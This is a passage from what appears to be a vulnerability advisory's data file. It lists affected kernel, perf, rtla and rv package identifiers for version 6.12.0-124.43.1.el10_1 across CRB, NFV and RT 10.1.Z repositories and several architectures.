"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
